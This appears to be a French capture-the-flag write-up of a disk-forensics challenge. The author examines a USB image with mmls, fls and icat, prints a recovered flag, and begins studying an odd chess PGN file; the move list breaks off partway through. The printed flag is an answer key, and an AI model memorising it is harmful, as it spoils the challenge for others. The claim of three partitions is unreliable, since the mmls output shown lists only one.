Maker is dead

Contexte

Un maker est retrouvé mort dans un incendie, les pompiers déclarent que la cause de l'incendie provient d'une imprimante 3D. Dans l'incendie, ils récupèrent une clef usb et un raspberry pi à analyser.

Partie I

Lord of War 1/4

Piste de recherche : flag.txt

Pour commencer, nous avons deux images disques :

Raw1.dd qui correspond à la clé USB retrouvé
Raw2.dd qui correspond au raspberry

Les 4 premières étapes du challenge consiste à récupérer des informations dans le Raw1.dd

Je commence par lister le contenu de cette image :

onosh@siftworkstation:# file Raw1.dd 
Raw1.dd: DOS/MBR boot sector; partition 1 : ID=0x7, start-CHS (0x0,32,33), end-CHS (0x79,222,37), startsector 2048, 1955840 sectors
onosh@siftworkstation:# mmls Raw1.dd 
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

      Slot      Start        End          Length       Description
000:  Meta      0000000000   0000000000   0000000001   Primary Table (#0)
001:  -------   0000000000   0000002047   0000002048   Unallocated
002:  000:000   0000002048   0001957887   0001955840   NTFS / exFAT (0x07)

Je découvre 3 partitions, dont une plus importante que les autres, la numéro "002" qui contient un système de fichier NTFS.

Je décide de regarder ce quelle contient :

onosh@siftworkstation:# fls -o 0000002048 -r -p Raw1.dd |grep -v '\$'
d/d 36-144-1:   System Volume Information
r/r 38-128-1:   System Volume Information/IndexerVolumeGuid
r/r 37-128-1:   System Volume Information/WPSettings.dat
-/r * 64-128-2: Flag.txt
-/r * 65-128-2: Meow.pdf
-/r * 66-128-2: Wiki.pdf
-/d * 67-144-2: MrNigloR-S01
-/r * 68-128-2: MrNigloR-S01/MrNigloR-S01-ep1-VOST.mp4
-/r * 69-128-2: MrNigloR-S01/MrNigloR-S01-ep1.mp4
-/d * 70-144-2: PgnChessBook
-/r * 71-128-2: PgnChessBook/Install_PgnChessBook.exe
-/r * 72-128-2: PgnChessBook/READ_ME_FIRST.txt
-/r * 73-128-2: PgnChessBook/my_best_game.pgn

Un fichier "Flag.txt" intéressant... ça semble être ce que l'on cherche vu notre piste de recherche ! J'extrait le fichier :

onosh@siftworkstation:# icat -o 0000002048 Raw1.dd 64-128-2 >flag.txt && cat flag.txt
ECW{59b931696910632cd89986ccbf626e388055477e}

J'ai mon premier flag ! ECW{59b931696910632cd89986ccbf626e388055477e} + 50 points

Lord of War 2/4

Piste de recherche : WALLET

Cette fois ci, on recherche quelque chose en rapport avec "Wallet" :

Portefeuille
Cryptomonnaie
Bitcoin, Ethereum ?

Je commence par chercher le mot clé dans l'image disque, mais sans succès :

onosh@siftworkstation:# grep -rina 'WALLET' Raw1.dd 
onosh@siftworkstation:# strings Raw1.dd |grep -in 'wallet'

Je décide donc d'approndir ma recherche dans les autres fichiers trouvé précemment !

J'ai à ma disposition :

2 fichiers PDF
2 Vidéos
Un jeu d'échec

Après quelques recherches dans le fichier PDF et les vidéos, aucune information semble pertinente pour cette piste "Wallet", je décide d'éplucher le jeu d'échec.

Le fichier PgnChessBook/READ_ME_FIRST.txt nous apprend qu'il est possible à partir du programme PgnChessBook/Install_PgnChessBook.exe d'importer une partie d'échec si elle est au format .pgn, ça tombe bien nous avons le fichier PgnChessBook/my_best_game.pgn.

J'éxécute le programme et j'importe le fichier :

Après quelques tests de simulation de la partie, on se rend vite compte qu'elle n'a aucun sens car les deux joueurs placent leurs pions n'importe comment.

Les données contenue dans le fichier my_best_game.pgn semblent d'autant plus étrange :

1. g3 h5 2. h4 Nh6 3. d3 g5 4. a3 b6 5. Nh3 a5 6. Rh2 d5 7. c3 b5 8. Bg2 Na6 9. g4 Qd6 10. Bh1 Qg3 11. c4 Ng8 12. hxg5 Qxh3 13. Qb3 Bd7 14. e3 Bc6 15. Nc3 Bh6 16. Be4 Qf3 17. Rh1 Qxf2+ 18. Kxf2 e5 19. d4 dxe4 20. Na2 f5 21. Qd3 Ra7 22. Nb4 hxg4 23. Ke2 a4 24. Rd1 Bb7 25. Nc6 Kf8 26. Rh1 Nf6 27. Ke1 Nb4 28. Qe2 Na6 29. Nb4 Ba8 30. Rh2 Bb7 31. Qc2 Bc8 32. Qf2 Bxg5 33. Qh4 c5 34. Qh7 Rhxh7 35. Na2 Ra8 36. Kd1 Bb7 37. Bd2 Re7 38. cxb5 Nd5 39. Rh5 Rc8 40. Rh2 Kg7 41. Bc1 Bh6 42. Re2 Ree8 43. Kd2 g3 44. Rh2 Nf6 45. Rh3 Kg6 46. Kc3 Rc6 47. Kc2 Rf8 48. Nc3 Ne8 49. Rh5 Bc8 50. Rxh6+ Kf7 51. dxe5 Nb4+ 52. axb4 cxb4 53. Kb1 b3 54. e6+ Kg8 55. Nd5 f4 56. Rh1 Ba6 57. exf4 Rc2 58. Nc3 Kg7 59. Be3 Rc1+ 60. Bxc1 Nf6 61. Nxa4 Bc8 62. Rh8 Rf7 63. Rh2 Re7 64. Rf2 Rf7 65. Rh2 Nh7 66. Rxh7+ Kf8 67. Nc5 Rxf4 68. Rh6 Bb7 69. Ra7 Rf3 70. e7+ Ke8 71. Rh5 Bd5 72. Nd7 Be6 73. Rh3 Bg8 74. Ka1 Rf6 75. Rh2 Bd5 76. Ne5 Rf1 77. Nf7 Bc6 78. Ra4 Rxf7 79. Ra2 Rxe7 80. bxc6 Rh7 81. Rxh7 Kf8 82. Bh6+ Ke8 83. Ra5 Kd8 84. Rg5 Ke8 85. c7 e3 86. Rd7 e2 87. Rg8+ Kxd7 88. Re8 e1=B 89. c8=B+ Kc6 90. Rxe1 Kd5 91. Bf8 Kd4 92. Be7 Kd5 93. Re3 Kd4 94. Rxb3 g2 95. Rc3 Ke5 96. Ba6 g1=B 97. b4 Bc5 98. Rc1 Bd4+ 99. Ka2 Ke4 100. b5 Ba1 101. Rc5 Bh8 102. Kb3 Kd3 103. Kb4 Kd4 104. Ka5 Ke3 105. Bb7 Bf6 106. Ba6 Bg5 107. Ka4 Kd4 108. Rc3 Ke5 109. Rd3 Bd2 110. Rg3 Bg5 111. Ka3 Kd5 112. Bb4 Bh6 113. Rg7 Bd2 114. Ka2 Be1 115. Be7 Ba5 116. Bf8 Ke6 117. Be7 Bd8 118. Kb2 Bb6 119. Bg5 Bg1 120. Bd8 Kf5 121. Ka2 Be3 122. Rb7 Ba7 123. Kb1 Bb6 124. Rb8 Bg1 125. Kc1 Bf2 126. b6 Be3+ 127. Kd1 Bf4 128. Bb7 Ke5 129. Ra8 Ke6 130. Bh1 Bh2 131. Ra3 Bg1 132. Ra7 Be3 133. Bf6 Bh6 134. Ra3 Bf4 135. Bg2 Bc7 136. Ra8 Bxb6 137. Ra4 Ba5 138. Bd4 Bc3 139. Kc1 Ba5 140. Bh1 Kd6 141. Bc5+ Kd7 142. Bd5 Bb4 143. Bb3 Bd2+ 144. Kb2 Ke8 145. Bd5 Bh6 146. Kb3 Kd7 147. Be4 Bc1 148. Be3 Ke6 149. Ba7 Ke5 150. Be3 Bd2 151. Bf2 Ke6 152. Be3 Ba5 153. Rc4 Kd7 154. Bc6+ Ke7 155. Re4+ Kf8 156. Bb5 Bc7 157. Bf4 Kg7 158. Bg3 Kf6 159. Ka4 Be5 160. Ba6 Kg5 161. Ka5 Kf6 162. Bc8 Kg5 163. Bh4+ Kh6 164. Kb4 Bc3+ 165. Kc4 Bh8 166. Bf6 Kg6 167. Re2 Bxf6 168. Bf5+ Kh6 169. Bh3 Kg7 170. Kb5 Bg5 171. Re1 Kh6 172. Ka4 Kg6 173. Re4 Bf6 174. Bf1 Kg7 175. Rb4 Be5 176. Rb3 Bd6 177. Kb5 Kf8 178. Rb4 Be7 179. Bc4 Bd8 180. Bg8 Be7 181. Kc6 Bh4 182. Ra4 Ke8 183. Kc5 Bd8 184. Bd5 Bb6+ 185. Kb4 Ba7 186. Kc3 Bf2 187. Kd2 Kd8 188. Bb7 Ke8 189. Kc2 Kf8 190. Rd4 Ke8 191. Ra4 Ke7 192. Kc1 Bb6 193. Bf3 Ke6 194. Kc2 Kf6 195. Bd5 Ba7 196. Rg4 Bd4 197. Rxd4 Ke5 198. Rd1 Kf4 199. Rc1 Ke5 200. Kc3 Kf4 201. Kd4 Kf5 202. Rd1 Kg4 203. Ra1 Kh5 204. Kc3 Kg4 205. Bg8 Kf5 206. Ra4 Ke5 207. Ra3 Ke4 208. Ba2 Ke5 209. Bf7 Kf4 210. Bc4 Kg3 211. Ra8 Kh3 212. Bd5 Kg4 213. Bh1 Kf5 214. Rg8 Kf6 215. Bg2 Ke5 216. Rg7 Kf4 217. Kc2 Ke5 218. Kb2 Kd6 219. Rg8 Kd7 220. Bf1 Kc6 221. Bc4 Kc5 222. Ka2 Kd6 223. Ka3 Ke5 224. Bd5 Kf6 225. Ba8 Ke5 226. Rg5+ Kf4 227. Be4 Ke3 228. Bf3 Kd4 229. Rg8 Kc3 230. Ka2 Kc4 231. Kb2 Kb4 232. Be2 Ka5 233. Rb8 Ka4 234. Bf3 Ka5 235. Kb1 Ka6 236. Rb7 Ka5 237. Be2 Ka4 238. Rb4+ Ka5 239. Ka1 Kxb4 240. Bb5 Kb3 241. Bd7 Kc4 242. Ba4 Kc5 243. Ka2 Kd5 244. Kb1 Kd4 245. Be8 Ke4 246. Ka1 Kf3 247. Bd7 Kg2 248. Ba4 Kg1 249. Bd1 Kg2 250. Kb1 Kg1 251. Bg4 Kh2 252. Ka1 Kh1 253. Bh3 Kh2 254. Bf1 Kg3 255. Bb5 Kh2 256. Ka2 Kg1 257. Kb1 Kf2 258. Ba4 Ke1 259. Bd7 Kf1 260. Bc6 Kf2 261. Ba4 Kg3 262. Bb5 Kh3 263. Bd7+ Kh4 264. Ka2 Kh5 265. Bb5 Kg4 266. Be2+ Kh4 267. Kb3 Kg5 268. Bf3 Kf4 269. Ka4 Ke5 270. Ba8 Kd4 271. Be4 Ke5 272. Bh7 Kf6 273. Bg6 Ke6 274. Bb1 Kd6 275. Ka5 Kc7 276. Bg6 Kd7 277. Be8+ Kc8 278. Ba4 Kd8 279. Kb4 Kc7 280. Bc2 Kb8 281. Kc3 Ka8 282. Kd2 Kb8 283. Ke1 Ka8 284. Kf2 Kb7 285. Kg1 Ka6 286. Kh1 Kb6 287. Bf5 Kb7 288. Kg1 Ka8 289. Bg4 Kb7 290. Kf2 Kb8 291. Kf1 Kb7 292. Bf3+ Ka7 293. Bh1 Kb8 294. Kg1 Kc8 295. Bg2 Kb8 296. Kf2 Ka7 297. Bh1 Kb6 298. Bd5 Ka7 299. Be6 Ka8 300. Bg8 Kb8 301. Bh7 Kc8 302. Ke3 Kd8 303. Bb1 Ke8 304. Kd4 Kd7 305. Kd5 Kc7 306. Kc5 Kb8 307. Kb4 Ka8 308. Kc4 Ka7 309. Bf5 Ka6 310. Kb4 Kb7 311. Ka4 Kb8 312. Kb5 Ka7 313. Bh3 Kb8 314. Kc4 Kb7 315. Kd5 Ka6 316. Be6 Ka5 317. Bg8 Ka6 318. Ke6 Kb5 319. Kd6 Kb4 320. Kd5 Ka4 321. Ke5 Kb4 322. Bf7 Ka5 323. Kf5 Kb4 324. Kg6 Ka3 325. Kh7 Ka4 326. Be6 Ka3 327. Kg7 Kb2 328. Bd5 Kc1 329. Bc4 Kd1 330. Kh7 Kc1 331. Bg8 Kd2 332. Kh8 Kc1 333. Kg7 Kd2 334. Ba2 Ke3 335. Bg8 Kf2 336. Bc4 Kg1 337. Ba2 Kf1 338. Kh6 Ke1 339. Kh7 Kd1 340. Kg6 Kc1 341. Kh6 Kd1 342. Bf7 Kc1 343. Bg6 Kb2 344. Be4 Kb3 345. Bf5 Ka4 346. Bc8 Kb3 347. Bf5 Ka3 348. Kg5 Kb4 349. Kf4 Ka4 350. Ke5 Ka3 351. Kf6 Ka2 352. Ke6 Kb2 353. Bh3 Kb1 354. Ke5 Kb2 355. Ke4 Ka3 356. Ke5 Kb3 357. Bg2 Ka3 358. Be4 Kb2 359. Kd6 Kc3 360. Kd7 Kc4 361. Bg2 Kd4 362. Bh1 Kc4 363. Ba8 Kb5 364. Ke7 Kb4 365. Bd5 Kc3 366. Ke8 Kd3 367. Ke7 Kd4 368. Be6 Ke3 369. Ba2 Kf3 370. Bd5+ Ke3 371. Bh1 Kd2 372. Kf7 Kd1 373. Ke7 Kd2 374. Kf6 Kd3 375. Bb7 Kd4 376. Kg7 Kc3 377. Kh6 Kb3 378. Bd5+ Ka4 379. Bf3 Ka5 380. Be4 Ka4 381. Bh7 Kb5 382. Bd3+ Kb6 383. Bg6 Ka7 384. Be4 Kb6 385. Kg6 Ka6 386. Bb1 Kb5 387. Bd3+ Kb4 388. Kg7 Ka3 389. Bh7 Kb2 390. Be4 Ka1 391. Bg2 Ka2 392. Kh8 Kb1 393. Kg8 Kc1 394. Be4 Kb2 395. Bf5 Kc3 396. Bd7 Kc2 397. Be6 Kd1 398. Bb3+ Kc1 399. Ba4 Kb2 400. Bc2 Kc1 401. Bd3 Kd2 402. Kg7 Kxd3 403. Kf7 Kc4 404. Kf6 Kc3 405. Kg6 Kd4 406. Kf7 Ke3 407. Ke8 Kf2 408. Ke7 Kg2 409. Kd8 Kf3 410. Ke8 Ke4 411. Kf7 Kf3 412. Kf8 Ke4 413. Ke8 Kd3 414. Kd7 Kc4 415. Ke8 Kc5 416. Ke7 Kd4 417. Ke8 Kd5 418. Kf7 Kc6 419. Kg7 Kb5 420. Kf7 Kc4 421. Kf6 Kb3 422. Kf5 Kb2 423. Kf4 Ka2 424. Ke3 Kb3 425. Kf3 Kc4 426. Ke4 Kc5 427. Kf3 Kd5 428. Ke3 Ke5 429. Kf3 Kd4 430. Kg4 Ke4 431. Kg3 Ke3 432. Kh3 Kf4 433. Kg2 Kf5 434. Kh1 Kf4 435. Kg1 Ke5 436. Kh2 Kf5 437. Kh1 Kg5 438. Kg1 Kh6 439. Kg2 Kg6 440. Kf3 Kh7 441. Ke3 Kg6 442. Kf3 Kf6 443. Kg2 Kf5 444. Kh1 Ke6 445. Kh2 Kd5 446. Kh1 Kc4 447. Kh2 Kb5 448. Kg3 Ka6 449. Kf4 Ka5 450. Ke5 Kb5 451. Kf6 Kc6 452. Kg5 Kc7 453. Kf5 Kd6 454. Kf6 Kc5 455. Ke7 Kd4 456. Kd6 Kd3 457. Kd7 Kd2 458. Kd6 Kc2 459. Kc7 Kb1 460. Kc8 Kc2 461. Kc7 Kb1 462. Kc6 Kc1 463. Kb5 Kb1 464. Ka5 Ka2 465. Kb4 Kb2 466. Ka4 Kb1 467. Ka5 Kc2 468. Ka4 Kc1 469. Ka3 Kd2 470. Kb3 Ke2 471. Ka2 Kd3 472. Ka3 Kd4 473. Ka2 Ke3 474. Kb1 Kf2 475. Kc2 Kf1 476. Kb2 Kg2 477. Ka1 Kh2 478. Ka2 Kg3 479. Kb3 Kg2 480. Kc4 Kh3 481. Kd4 Kh2 482. Kc5 Kg3 483. Kb6 Kf2 484. Kb5 Kf1 485. Kb4 Kg1 486. Ka4 Kh2 487. Kb4 Kg2 488. Kb5 Kg3 489. Ka5 Kh2 490. Ka4 Kh3 491. Kb5 Kg2 492. Ka6 Kf3 493. Ka7 Ke3 494. Kb7 Ke2 495. Ka8 Ke3 496. Ka7 Kd4 497. Ka8 Kc4 498. Ka7 Kb3 499. Kb8 Kb4 500. Kc7 Ka3 501. Kd6 Kb3 502. Kc5 Kb2 503. Kb6 Ka3 504. Kc7 Kb2 505. Kc6 Kc3 506. Kd6 Kb3 507. Ke6 Ka2 508. Kd6 Kb3 509. Kc5 Kc2 510. Kd5 Kb3 511. Kc5 Ka2 512. Kb6 Ka1 513. Ka6 Kb1 514. Kb5 Kc1 515. Ka5 Kd2 516. Kb4 Kd3 517. Kb3 Ke4 518. Kc3 Ke5 519. Kb2 Kd6 520. Kc2 Kd5 521. Kb2 Kc6 522. Ka1 Kd6 523. Kb2 Ke7 524. Kc2 Kd6 525. Kc1 Ke5 526. Kd2 Kf5 527. Ke2 Kg4 528. Ke1 Kg5 529. Kf2 Kf6 530. Kg3 Kg6 531. Kf2 Kh7 532. Kf3 Kg7 533. Kf4 Kf6 534. Kf3 Kf7 535. Ke4 Ke6 536. Kd4 Kf7 537. Kd5 Kg6 538. Ke5 Kh7 539. Kd5 Kh6 540. Ke4 Kg6 541. Kd3 Kg7 542. Kc3 Kg8 543. Kb4 Kg7 544. Ka5 Kf7 545. Ka4 Ke8 546. Kb4 Kf8 547. Kc5 Ke8 548. Kd6 Kf8 549. Kc5 Ke8 550. Kc6 Kf8 551. Kb5 Kg7 552. Kb6 Kh8 553. Kb7 Kg8 554. Ka8 Kh7 555. Kb7 Kg7 556. Kc6 Kh8 557. Kb6 Kg7 558. Ka7 Kg8 559. Kb6 Kf8 560. Kc7 Ke7 561. Kc8 Ke8 562. Kb7 Kf7 563. Kc6 Ke6 564. Kb7 Kf7 565. Kc7 Kg8 566. Kd7 Kf7 567. Kc7 Ke6 568. Kc6 Kf6 569. Kc5 Kg5 570. Kb6 Kf4 571. Kc5 Kf5 572. Kc4 Ke5 573. Kb3 Kd5 574. Ka2 Kc5 575. Kb2 Kb4 576. Ka1 Ka5 577. Kb1 Ka4 578. Kc2 Kb4 579. Kb1 Ka4 580. Kc2 Kb4 581. Kb2 Kc5 582. Ka3 Kc6 583. Kb4 Kc7 584. Ka5 Kb7 585. Kb4 Ka6 586. Kb3 Kb5 587. Kc2 Ka5 588. Kb2 Ka4 589. Kc3 Kb5 590. Kb2 Ka4 591. Ka2 Kb5 592. Ka3 Ka5 593. Kb3 Kb6 594. Kc2 Ka7 595. Kc3 Ka8 596. Kc4 Kb7 597. Kc3 Ka6 598. Kc4 Kb7 599. Kd5 Ka7 600. Ke4 Kb8 601. Ke5 Kb7 602. Kd5 Ka8 603. Ke6 Ka7 604. Kd6 Ka8 605. Kd7 Kb7 606. Kd6 Kb6 607. Ke6 Ka6 608. Kf6 Ka5 609. Kf5 Kb5 610. Ke4 Ka5 611. Kf4 Kb5 612. Kf3 Ka6 613. Kg2 Kb6 614. Kf3 Kc6 615. Kf2 Kd6 616. Ke2 Ke6 617. Ke1 Kf5 618. Kd1 Kg6 619. Kd2 Kg7 620. Kd1 Kf6 621. Kc2 Ke5 622. Kb2 Kf5 623. Ka2 Ke6 624. Kb1 Ke5 625. Ka2 Kd5 626. Ka1 Ke4 627. Ka2 Ke3 628. Ka1 Kf2 629. Kb2 Ke1 630. Ka1 Kd2 631. Ka2 Ke3 632. Kb2 Kd2 633. Ka1 Kd1 634. Ka2 Kc1 635. Ka3 Kd1 636. Kb3 Kc1 637. Ka2 Kd2 638. Ka3 Kc3 639. Ka2 Kd2 640. Kb3 Kd3 641. Ka2 Ke3 642. Kb3 Kd4 643. Kc2 Ke5 644. Kb2 Kf6 645. Kc2 Ke7 646. Kb1 Kf6 647. Kb2 Kg7 648. Ka1 Kh7 649. Kb2 Kg6 650. Kb1 Kh5 651. Kc1 Kg6 652. Kb1 Kg5 653. Kb2 Kh6 654. Kc2 Kh7 655. Kd2 Kh8 656. Kd3 Kg8 657. Kd2 Kh8 658. Kc3 Kg8 659. Kb4 Kf7 660. Kb5 Kg8 661. Ka5 Kg7 662. Kb6 Kg6 663. Kc7 Kh6 664. Kb8 Kh5 665. Ka8 Kg6 666. Kb7 Kh6 667. Kc8 Kg6 668. Kb7 Kf6 669. Kc6 Kf5 670. Kb6 Kf6 671. Kc6 Ke6 672. Kc7 Kd5 673. Kb7 Ke5 674. Ka8 Ke6 675. Kb8 Kd5 676. Kc8 Ke5 677. Kd7 Kf4 678. Ke8 Kg5 679. Kf8 Kh6 680. Ke7 Kg5 681. Kd8 Kf6 682. Kd7 Kg6 683. Ke6 Kg7 684. Ke5 Kf7 685. Ke4 Kf8 686. Kd3 Ke7 687. Ke3 Kd8 688. Kf2 Kc8 689. Kf3 Kb8 690. Kf2 Ka8 691. Kg3 Ka7 692. Kf3 Kb7 693. Kf2 Kc6 694. Ke2 Kb5 695. Kf2 Kb6 696. Kg1 Kb7 697. Kf1 Ka6 698. Kg1 Kb5 699. Kh2 Kb4 700. Kg1 Ka4 701. Kg2 Ka5 702. Kh3 Kb4 703. Kh4 Kb5 704. Kg3 Kc5 705. Kg4 Kd5 706. Kf4 Kc6 707. Kg3 Kb6 708. Kh2 Ka7 709. Kh3 Kb6 710. Kg4 Kb5 711. Kh3 Ka6 712. Kg2 Ka5 713. Kg1 Kb4 714. Kh1 Ka3 715. Kh2 Kb4 716. Kh1 Kc5 717. Kg1 Kd4 718. Kf1 Kc4 719. Ke1 Kc3 720. Kd1 Kb3 721. Ke2 Kb2 722. Kf3 Ka3 723. Kg3 Kb4 724. Kf3 Ka3 725. Kf4 Kb2 726. Kf3 Kb3 727. Kg2 Ka4 728. Kh2 Kb3 729. Kg3 Ka2 730. Kf2 Ka3 731. Ke3 Ka2 732. Kf2 Kb3 733. Kg3 Kb4 734. Kg2 Kb5 735. Kf2 Kb6 736. Kg1 Ka5 737. Kf1 Kb5 738. Kf2 Kc6 739. Kf1 Kd5 740. Kf2 Kc4 741. Kg3 Kc3 742. Kf3 Kb2 743. Kg4 Kc3 744. Kh3 Kd3 745. Kg3 Ke4 746. Kh3 Kd3 747. Kg3 Ke4 748. Kf2 Kf5 749. Ke3 Kg5 750. Kd2 Kh6 751. Ke3 Kg7 752. Kf3 Kf8 753. Ke3 Ke8 754. Ke2 Ke7 755. Kd2 Kf6 756. Kd1 Ke7 757. Kc1 Kf7 758. Kb2 Ke7 759. Kb3 Kd8 760. Kc3 Kd7 761. Kd3 Ke7 762. Ke3 Kd6 763. Kf2 Kd5 764. Kf1 Kc5 765. Kf2 Kc6 766. Kf1 Kb6 767. Kg1 Kb7 768. Kh2 Kc7 769. Kh3 Kb8 770. Kg3 Kc8 771. Kg4 Kb8 772. Kh5 Kc8 773. Kh6 Kb8 774. Kg6 Ka7 775. Kh6 Kb8 776. Kg6 Kc7 777. Kh5 Kc6 778. Kg6 Kc5 779. Kg5 Kc4 780. Kh6 Kd5 781. Kg7 Kc4 782. Kg8 Kb5 783. Kh8 Kb6 784. Kg7 Ka7 785. Kh7 Kb6 786. Kg7 Kc6 787. Kf8 Kd6 788. Kf7 Kc5 789. Kg8 Kd6 790. Kf7 Kc7 791. Kg7 Kb8 792. Kh7 Ka8 793. Kh6 Kb8 794. Kh5 Ka8 795. Kg4 Kb7 796. Kh5 Kb6 797. Kg6 Ka5 798. Kf6 Ka6 799. Ke7 Kb6 800. Kd6 Ka6 801. Ke6 Kb5 802. Kd5 Ka5 803. Kc4 Kb6 804. Kd3 Ka5 805. Kc3 Kb6 806. Kc4 Kc6 807. Kb3 Kc7 808. Ka3 Kb8 809. Kb2 Ka8 810. Kc1 Ka7 811. Kb2 Kb6 812. Ka3 Kb7 813. Ka4 Kc7 814. Kb5 Kc8 815. Kb6 Kd8 816. Kb7 Kd7 817. Ka8 Ke8 818. Ka7 Ke7 819. Ka8 Kf8 820. Ka7 Ke8 821. Ka6 Ke7 822. Kb5 Kd6 823. Kb4 Kd7 824. Kb5 Kd8 825. Ka6 Ke8 826. Ka5 Ke7 827. Kb6 Kd8 828. Ka7 Kc8 829. Ka8 Kc7 830. Ka7 Kd7 831. Kb7 Kd8 832. Ka6 Ke7 833. Kb5 Kf8 834. Ka6 Ke8 835. Ka7 Kd7 836. Ka8 Kc8 837. Ka7 Kc7 838. Ka6 Kd8 839. Ka7 Kc7 840. Ka8 Kc6 841. Kb8 Kc5 842. Kc7 Kd4 843. Kc8 Kc4 844. Kd8 Kc3 845. Kc7 Kd2 846. Kd7 Kd3 847. Ke6 Kd4 848. Kf7 Ke3 849. Kg8 Kd3 850. Kf7 Kd2 851. Kf8 Kc3 852. Kg7 Kd3 853. Kh8 Kc3 854. Kg8 Kc4 855. Kh7 Kb5 856. Kh6 Kc6 857. Kg6 Kd6 858. Kg7 Kc7 859. Kf8 Kc6 860. Kg8 Kd7 861. Kg7 Kd8 862. Kf8 Kc7 863. Kg8 Kb8 864. Kh7 Kc8 865. Kh8 Kb8 866. Kh7 Kc7 867. Kg7 Kb7 868. Kf6 Kc8 869. Ke7 Kb8 870. Kd7 Kb7 871. Kd6 Kb8 872. Kc6 Kc8 873. Kb5 Kb7 874. Kc5 Kb8 875. Kd5 Ka7 876. Kc6 Kb8 877. Kd5 Kc7 878. Kc5 Kd7 879. Kd5 Ke7 880. Kc4 Kf7 881. Kc5 Ke8 882. Kc4 Ke7 883. Kb4 Kd8 884. Ka3 Kd7 885. Kb4 Kc7 886. Kb3 Kb6 887. Kb4 Kc6 888. Kc3 Kb6 889. Kc2 Kc7 890. Kc3 Kb6 891. Kb3 Kc6 892. Ka2 Kd6 893. Kb3 Ke5 894. Ka4 Ke4 895. Ka5 Kf3 896. Ka6 Kg2 897. Kb7 Kh2 898. Kb6 Kg1 899. Kb5 Kg2 900. Kc5 Kh2 901. Kb5 Kg3 902. Kc5 Kf2 903. Kb4 Kf3 904. Ka5 Kg3 905. Kb6 Kf4 906. Kc6 Kf5 907. Kb7 Ke5 908. Ka6 Kd6 909. Kb6 Kd7 910. Ka5 Kd6 911. Kb6 Kd7 912. Ka6 Ke7 913. Kb5 Ke6 914. Ka5 Kd6 915. Kb6 Ke7 916. Kc5 Ke8 917. Kc6 Kd8 918. Kb7 Kd7 919. Ka8 Kd8 920. Ka7 Kc7 921. Ka8 Kb6 922. Kb8 Ka5 923. Kc7 Ka6 924. Kc8 Kb6 925. Kd8 Kb7 926. Kd7 Ka7 927. Kc8 Ka6 928. Kd8 Ka7 929. Kc7 Ka8 930. Kc6 Ka7 931. Kd7 Kb7 932. Ke6 Ka8 933. Ke7 Ka7 934. Kf8 Kb6 935. Ke8 Kc6 936. Kf7 Kb7 937. Ke6 Ka6 938. Ke5 Ka7 939. Ke6 Ka6 940. Kd5 Kb5 941. Ke6 Kc5 942. Kf7 Kd5 943. Kg8 Kc6 944. Kg7 Kb7 945. Kg6 Kc7 946. Kh7 Kb6 947. Kg8 Kc5 948. Kh8 Kd6 949. Kg7 Kc7 950. Kg6 Kd8 951. Kg5 Kc7 952. Kh4 Kb7 953. Kg4 Ka6 954. Kh5 Ka7 955. Kg4 Ka8 956. Kf4 Ka7 957. Kg4 Ka8 958. Kh5 Kb7 959. Kh6 Kc7 960. Kg5 Kb7 961. Kf5 Ka6 962. Kg4 Kb5 963. Kg3 Kb6 964. Kh2 Kc7 965. Kh1 Kc8 966. Kg2 Kb8 967. Kg3 Ka7 968. Kg2 Kb6 969. Kg3 Kc5 970. Kh4 Kc6 971. Kg3 Kc7 972. Kh2 Kd6 973. Kg3 Ke6 974. Kf3 Kd6 975. Kg2 Kc6 976. Kf2 Kc5 977. Kg3 Kd4 978. Kh2 Ke4 979. Kg2 Ke5 980. Kh1 Kd4 981. Kg2 Kc4 982. Kg3 Kc3 983. Kf2 Kc4 984. Ke2 Kd4 985. Kd2 Kc4 986. Kc1 Kb4 987. Kd2 Kb3 988. Kd1 Kc4 989. Ke2 Kb5 990. Kd2 Ka5 991. Kc1 Kb6 992. Kb2 Ka5 993. Ka3 Kb5 994. Kb3 Kc5 995. Ka4 Kd5 996. Kb4 Ke6 997. Ka5 Kd6 998. Kb6 Kd5 999. Ka7 Kc4 1000. Ka8 Kc5 1001. Kb8 Kd4 1002. Kb7 Kc3 1003. Ka8 Kb2 1004. Kb8 Kc2 1005. Kc8 Kd1 1006. Kb8 Kc2 1007. Ka7 Kd3 1008. Kb8 Ke4 1009. Kc8 Kf4 1010. Kb7 Kg4 1011. Kc7 Kh4 1012. Kb8 Kg3 1013. Ka8 Kh3 1014. Ka7 Kh4 1015. Kb6 Kg4 1016. Ka7 Kf3 1017. Kb8 Kg4 1018. Kb7 Kg3 1019. Kc7 Kf2 1020. Kd7 Ke1 1021. Kd8 Ke2 1022. Kd7 Kd3 1023. Kc8 Kd2 1024. Kd8 Kc2 1025. Kc7 Kc1 1026. Kb7 Kb1 1027. Kb6 Kb2 1028. Kc7 Kb3 1029. Kb7 Ka2 1030. Ka8 Ka3 1031. Ka7 Kb2 1032. Kb8 Ka1 1033. Kb7 Kb2 1034. Ka6 Kc1 1035. Ka5 Kb1 1036. Kb5 Kc1 1037. Ka6 Kc2 1038. Kb7 Kd3 1039. Kc6 Kc2 1040. Kb6 Kd2 1041. Kb5 Kc3 1042. Ka4 Kd4 1043. Ka5 Kd5 1044. Kb6 Ke6 1045. Kc7 Kf6 1046. Kd6 Kg6 1047. Kc6 Kf6 1048. Kb6 Kg7 1049. Kc6 Kh8 1050. Kc5 Kg8 1051. Kc6 Kg7 1052. Kb5 Kh6 1053. Ka6 Kg6 1054. Ka7 Kh5 1055. Kb7 Kg4 1056. Kb8 Kh3 1057. Ka7 Kh4 1058. Kb8 Kg5 1059. Kc7 Kh6 1060. Kd6 Kg7 1061. Ke7 Kg8 1062. Kd8 Kf8 1063. Kc7 Ke8 1064. Kc8 Ke7 1065. Kb7 Kf8 1066. Ka8 Ke8 1067. Kb7 Kd8 1068. Ka7 Ke7 1069. Kb6 Kd7 1070. Kb5 Kd6 1071. Kb4 Kc7 1072. Ka5 Kb8 1073. Kb6 Kc8 1074. Kc6 Kb8 1075. Kd6 Kc8 1076. Kc6 Kb8 1077. Kb6 Ka8 1078. Kb5 Ka7 1079. Kc6 Kb8 1080. Kd6 Kc8 1081. Kd5 Kd8 1082. Ke6 Ke8 1083. Ke5 Ke7 1084. Kf4 Kf7 1085. Kf3 Ke7 1086. Ke4 Kd7 1087. Ke5 Kc6 1088. Kf4 Kd7 1089. Kf5 Kd6 1090. Kf6 Kd7 1091. Kf5 Kd8 1092. Kg6 Kc7 1093. Kh7 Kd6 1094. Kg7 Ke5 1095. Kf8 Ke4 1096. Ke7 Kf3 1097. Kf7 Kg3 1098. Kf8 Kh3 1099. Ke8 Kh2 1100. Kf8 Kg1 1101. Ke8 Kh1 1102. Kd8 Kg1 1103. Kc8 Kf1 1104. Kc7 Kg2 1105. 